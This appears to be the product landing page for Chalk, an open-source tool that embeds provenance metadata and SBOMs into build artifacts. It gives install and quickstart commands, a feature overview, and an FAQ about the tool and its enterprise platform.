GPL License Supply Chain Observability

Chalk

GPS for your software. Chalk adds provenance metadata into any build artifact so you always know where it came from and where it gets deployed. One CLI, 5 lines of YAML in CI/CD, complete supply chain visibility.

Star on GitHub Talk to a human about enterprise

# Download the latest Chalk binary
curl -fsSL https://github.com/crashappsec/chalk/releases/latest/download/chalk-$(uname -s)-$(uname -m) -o chalk
chmod +x chalk
sudo mv chalk /usr/local/bin/

# Verify installation
chalk version

# Install via Homebrew
brew install crashappsec/tap/chalk

# Verify installation
chalk version

# Use the Chalk Docker image
docker run --rm ghcr.io/crashappsec/chalk version

# Chalk a Docker build
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
  ghcr.io/crashappsec/chalk docker build -t myapp .

Lines of YAML in CI/CD

CLI to mark & extract

GPL

Open source license

External dependencies

Why Chalk

Complete supply chain observability

Know exactly what you built, how you built it, and where it's running. Chalk gives you provenance, SBOMs, and runtime monitoring in a single tool.

Chalk Mark Insertion

Embed provenance metadata directly into your build artifacts: binaries, containers, scripts, and more. Chalk marks travel with the artifact, not in a sidecar database.

Chalk Mark Extraction

Extract chalk marks from any artifact to answer 'where did this come from?' Retrieve the full build context, commit hash, builder identity, and CI/CD metadata.

SBOM Generation

Automatically generate Software Bills of Materials during builds. Chalk produces CycloneDX SBOMs embedded in or alongside your artifacts for supply chain transparency.

Runtime Heartbeat

Monitor deployed artifacts in production with periodic heartbeat reporting. Know exactly what versions are running, where, and when they were last seen.

CI/CD Integration

Add chalk to any CI/CD pipeline with 5 lines of YAML. Works with GitHub Actions, GitLab CI, Jenkins, CircleCI, and any system that runs shell commands.

Digital Signatures & Provenance

Cryptographically sign chalk marks to prove artifact integrity. Full code provenance tracking from source commit through build to deployment.

How Chalk works

Build. Mark. Deploy. Monitor.

Build Artifact (binary, container, script)

↓

chalk insert — embeds provenance metadata + SBOM into artifact

↓

chalk extract — retrieve chalk marks from any artifact

↓

Report

Heartbeat

SBOM

Chalk lifecycle — from build through production

5-minute quickstart

From install to first chalk mark

Download the binary. Point it at your build. Every artifact now carries its own provenance. No config files, no cloud account, no vendor lock-in.

Full documentation →

Install Chalk

$ brew install crashappsec/tap/chalk
✓ chalk installed successfully

Chalk your build artifact

$ chalk insert ./my-binary
Chalk mark inserted into ./my-binary
  commit:  a1b2c3d
  builder: github-actions
  time:    2026-03-17T10:42:00Z

Extract the chalk mark later

$ chalk extract ./my-binary
CHALK_ID:    f8e7d6c5-b4a3-9281-0fed-cba987654321
ORIGIN_URI:  [email protected]:myorg/myrepo.git
COMMIT_ID:   a1b2c3d
BRANCH:      main

Using Chalk in production?

The Crash Override platform adds deep build inspection

Enterprise builds on Chalk with centralized visibility across all your repositories, deep build inspection, policy enforcement, team management, SSO/RBAC, audit logs, and dedicated support from our engineering team.

Talk to an engineer

Deep build inspection

SSO + RBAC + audit logs

Org-wide supply chain visibility

Frequently asked questions

What is a chalk mark?

A chalk mark is a small piece of provenance metadata that Chalk embeds directly into a build artifact (binary, container image, or script) at build time. It contains information like the source commit, build timestamp, builder identity, and CI/CD context. Think of it as a GPS tag for your software. It tells you where the artifact came from and how it was built, and travels with the artifact wherever it goes.

Is Chalk free to use?

Yes. Chalk is GPL licensed and completely free. The GPL license ensures that modifications to Chalk itself remain open source. You can use Chalk to mark your proprietary software without any license implications for your own code. The GPL applies to Chalk, not the artifacts it marks.

What's the difference between Chalk and the Crash Override platform?

Chalk is the open-source CLI tool that inserts and extracts chalk marks, generates SBOMs, and provides runtime heartbeat monitoring. The Crash Override platform builds on top of Chalk to add deep build inspection, centralized visibility across all your repositories, team management, policy enforcement, and enterprise integrations. If you need a single-repo CLI tool, Chalk alone works great. If you need organization-wide supply chain visibility, the platform adds that layer.

What artifact types does Chalk support?

Chalk works with ELF binaries, Mach-O binaries, PE executables, Docker/OCI container images, Python scripts, shell scripts, and ZIP archives. For containers, Chalk can mark both the image layers and the build metadata. The artifact type is detected automatically; just point Chalk at your build output.

How do I contribute to Chalk?

Fork the repository at github.com/crashappsec/chalk, make your changes, and open a pull request. Check the CONTRIBUTING.md file for development setup, coding standards, and testing requirements. Good first issues are tagged on GitHub if you're looking for a place to start.

Mark your first artifact in under 5 minutes

Download the binary, point it at your build, and every artifact carries its own provenance. No account required.

Star on GitHub Talk to a human about enterprise